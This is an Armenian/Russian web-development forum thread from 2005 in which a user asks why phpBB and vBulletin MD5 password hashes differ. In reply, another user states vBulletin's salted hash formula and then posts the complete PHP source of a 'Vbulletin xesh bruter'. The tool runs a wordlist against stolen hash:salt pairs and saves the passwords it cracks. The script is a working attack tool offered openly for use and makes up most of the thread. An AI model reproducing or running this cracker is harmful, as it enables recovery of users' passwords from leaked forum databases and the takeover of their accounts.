AKB Forums

Go Back   AKB Forums > Technical sections > Languages, Compilers and Interpreters > Web Development
Home Register Blogs FAQ Members List Calendar Downloads Arcade Mark Forums Read

Web Development Java/PHP/Perl/ASP and more

Troubles when posting message? Click here! :: Проблемы с отправлением сообщения? Нажмите сюда!

Reply
 
LinkBack Thread Tools Display Modes
Old Dec 11, 2005, 21:30   #1
barev
 
poet's Avatar
 
Join Date: Dec 2005
Location: Yereva, Armenia
Posts: 56
Rep Power: 0
Reputation: 10
Send a message via ICQ to poet Send a message via MSN to poet Send a message via Yahoo to poet Send a message via Skype™ to poet
PHPBB, VB, MD5 :)

PPl jan senc prob ka. PHPBB i MD5 er@ haskacvuma . Iskapes MD5 a lol. Isk VB n@ hamematum em PHPBB i het chi brnum. Bnakanabar nuyn passer@. Ov texekucyunner uni?
poet is offline   Reply With Quote Quote selected
Old Dec 12, 2005, 08:12   #2
Авик
 
CyberJoe's Avatar
 
Join Date: Jul 2002
Location: Yerevan
Posts: 1,347
Rep Power: 7
Reputation: 19
Send a message via ICQ to CyberJoe
Re: PHPBB, VB, MD5 :)

@ndex baci MD5 urish banela anum, source cod@ naji tes.
karoxa MD5-i vric mi hatela MD5 anum....hazar u mi ban ka..
__________________
вот собственно все, что я хотел сказать.
CyberJoe is offline   Reply With Quote Quote selected
Old Dec 12, 2005, 09:07   #3
barev
 
poet's Avatar
 
Join Date: Dec 2005
Location: Yereva, Armenia
Posts: 56
Rep Power: 0
Reputation: 10
Send a message via ICQ to poet Send a message via MSN to poet Send a message via Yahoo to poet Send a message via Skype™ to poet
Re: PHPBB, VB, MD5 :)

Ha es el ei mtatsum vor mi hat ela MD5 dradznum bayc che. Daze mi 10-15 angam areci et arzeq@ chem stanum . Ete mekd giteq incha anum aseq. Zayla chka dra code in nayelu
poet is offline   Reply With Quote Quote selected
Old Dec 12, 2005, 09:29   #4
Авик
 
CyberJoe's Avatar
 
Join Date: Jul 2002
Location: Yerevan
Posts: 1,347
Rep Power: 7
Reputation: 19
Send a message via ICQ to CyberJoe
Re: PHPBB, VB, MD5 :)

Ходят слухи....
$hash = md5(md5($password).$salt)
__________________
вот собственно все, что я хотел сказать.

Last edited by CyberJoe : Dec 13, 2005 at 16:10.
CyberJoe is offline   Reply With Quote Quote selected
Old Dec 12, 2005, 09:32   #5
Авик
 
CyberJoe's Avatar
 
Join Date: Jul 2002
Location: Yerevan
Posts: 1,347
Rep Power: 7
Reputation: 19
Send a message via ICQ to CyberJoe
Re: PHPBB, VB, MD5 :)

PHP Code:
<?php 

// Vbulletin xesh bruter v1.2 
// virgoz icq:907674 http://vi-project.com 
// (c) Copyright 31.10.2005 

echo "<html><head><title>Vbulletin xesh bruter v1.1 by virgoz</title><meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\"></head><body> 
<form method=post><font color=\"#FF9933\"><i><b>Vbulletin xesh bruter v1.1 by virgoz</b></i></font><br> 
Dictionary file: <br><input type=text name=o_d size=\"20\" value=\"o_d.txt\"><br> 
Xesh-solt file(xesh:solt): <br><input type=text name=x_s size=\"20\" value=\"x_s.txt\"><br> 
<input name=\"Submit\" type=submit value='Go!' > 
</form>\n"


set_time_limit(0); 
ignore_user_abort(1); 

$result "result.txt";  // result file 

if(!isset($o_d) and !isset($x_s)) exit; 
if(@
fopen($result,"r")) unlink($result); 

$n = @fopen($x_s,"r"); 
if(!
$n){echo "Can't open xesh-solt file!"; exit;} 
while(!
feof($n)) 

   
$p_s_str fgets($n100); 
   
$xesh_solt explode(":",$p_s_str); $xesh $xesh_solt[0]; $solt $xesh_solt[1]; 
   
$n2 = @fopen($o_d,"r"); 
   if(!
$n2) {echo "Can't open dictionary file!"; exit;} 
   while(!
feof($n2)) 
   { 
      
$pass fgets($n2100); 
      
$pass_ws md5(md5(trim($pass)).trim($solt)); 
      if(
$pass_ws==$xesh
      { 
         echo 
"<b>$xesh:$pass</b><br>\n"
         
$st $xesh.":".$pass$n3 = @fopen($result,"a"); if($n3){fwrite($n3,$st); fclose($n3);} 
         break; 
      } 
   } 
   
fclose($n2); 

fclose($n); 
$st "THE END!"$n4 = @fopen($result,"a"); if($n4){fwrite($n4,$st); fclose($n4);} 
echo 
"<br>THE END!"
echo 
"</body></html>\n"

?>
__________________
вот собственно все, что я хотел сказать.
CyberJoe is offline   Reply With Quote Quote selected
Reply


Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On


Similar Threads
Thread Thread Starter Forum Replies Last Post
phpbb unban(админы зайдите ка а) Obelix Web Development 2 Sep 17, 2003 09:38
Mojno li v VB kod vstavit sql zapros serty Languages, Compilers and Interpreters 1 Jul 18, 2002 10:41
Mne bi skachat dokumentaciyu po VB:)))))) serty Languages, Compilers and Interpreters 2 May 1, 2002 01:41
VB programers needed Taurus Jobs 1 Apr 24, 2002 05:58
Problem when VB dll is called through VC++ kamu Languages, Compilers and Interpreters 1 Nov 6, 2001 14:17


All times are GMT. The time now is 21:41.


Powered by vBulletin® Version 3.6.8
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
This board was founded on September 29, 2001
Powered by Viper Internet

Affordable Web Hosting | ParevNet

Buy text link